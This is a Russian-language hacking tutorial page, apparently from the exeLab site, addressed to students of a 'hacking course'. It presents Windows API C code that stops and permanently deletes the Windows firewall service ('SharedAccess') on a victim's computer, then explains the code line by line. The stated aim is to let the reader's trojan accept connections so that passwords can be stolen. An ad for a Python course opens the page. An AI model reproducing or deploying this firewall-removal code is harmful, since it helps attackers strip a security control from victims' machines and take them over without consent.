Оригинальный DVD-ROM: eXeL@B DVD !
eXeL@B ВИДЕОКУРС !

ВИДЕОКУРС ВЗЛОМ
выпущен 8 мая!


УЗНАТЬ БОЛЬШЕ >>
Домой | Статьи | RAR-cтатьи | FAQ | Форум | Скачать | Видеокурс
Новичку | Ссылки | Программирование | Интервью | Архив | Связь

ПРОГРАММИРОВАНИЕ НА C и С++



Слушай, дружище, зачем так мучиться с этим языком С++, ты ведь не Билл Гейтс. Возьми тот же Python и программируй, он кроссплатформенный, под Windows тоже работает. Я сам давно заметил: то что на Си пишешь в страницу кода, на питоне решается в одну-две строки. При том, питон намного проще, я его сам недавно изучил по видеокурсу вот этому. Кстати, автор отлично там объясняет. Буквально день-два и уже будешь писать на нём, чего не скажешь про сложный С++.

         Убиваем виндовый брандмауэр

          Здравствуй уважаемый ученик моих курсов по хаку! Ну, наконец-то ты с горем по-полам, еле-еле сделал свой примитивный троянчик, его запускает жертва!

          И??? Ничего не происходит? Тебе приходит IP жертвы на мыло, а ты тем самым не можешь к нему законнектиться, узнать пароли и т.д? И ты точно уверен, что он только вчера сел за комп? Он не знает о существовании фаерволлов, брандмауэров, антивирусов? Да? Тогда все ясно, его защищает хрень под названием “Виндовый глючный брандмауэр для ламаков“.

          Данная супер разработка от мелкомягких была создана для повышения безопасности пользователей Internet. Включена она в винду, начиная в XP'ени, и дальше…. Смысл ее работы таков: Данный брандмауэр защищает от атак и левых коннектов извне, но изнутри все открыто! А ты думаешь, почему тебе пришло письмо в IP жертвы на мыло?

          Теперь, что нам надо………Нам надо открыть доступ и снаружи! Зачем закрывать то, что должно быть открытым? ;-)) Данный брандмауэр встроен в виндовс как сервис, который загружается вместе в ней! Я вот подумал, а может удалить его? Конечно, можно отключить, но жертва может заметить, и опять его врубит и т.п., а в случае удаления, его можно восстановить только после “format c:“ ;-) и полного перевешивания винды. А, я думаю, что ему будет очень влом этим заниматься :) Приступим к кодингу!

          Ниже приведен код удаления брандмауэра:

SC_HANDLE hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
if (hSCM != NULL)
{
SC_HANDLE hService = OpenService(hSCM, “SharedAccess“, SERVICE_STOP | DELETE);
if (hService != NULL)
{
SERVICE_STATUS Status;
ControlService(hService, SERVICE_CONTROL_STOP, &Status);
Sleep(200);
BOOL bOk = DeleteService(hService);
}
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCM);

          А теперь подробнее:
1) Чтобы работать с сервисами нужно получит хендл на них:

SC_HANDLE hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

          2) Затем необходимо уже получить хендл на сам сервис: он называется “SharedAccess“, с правами на остановку и удаление:

SC_HANDLE hService = OpenService(hSCM, “SharedAccess“, SERVICE_STOP | DELETE);

          3) ну и удаляем его, не забыв предварительно остановить! Кстати, заметьте, что для корректной остановки и удаления между ними есть пауза в 200 миллисекунд:

SERVICE_STATUS Status;
ControlService(hService, SERVICE_CONTROL_STOP, &Status);
Sleep(200);
BOOL bOk = DeleteService(hService);

          4) Освобождаем ресурсы:

CloseServiceHandle(hService);
CloseServiceHandle(hSCM);

         

<< ВЕРНУТЬСЯ В ПОДРАЗДЕЛ

<< ВЕРНУТЬСЯ В ОГЛАВЛЕНИЕ




Материалы находятся на сайте https://exelab.ru/pro/



Оригинальный DVD-ROM: eXeL@B DVD !


Вы находитесь на EXELAB.rU
Проект ReactOS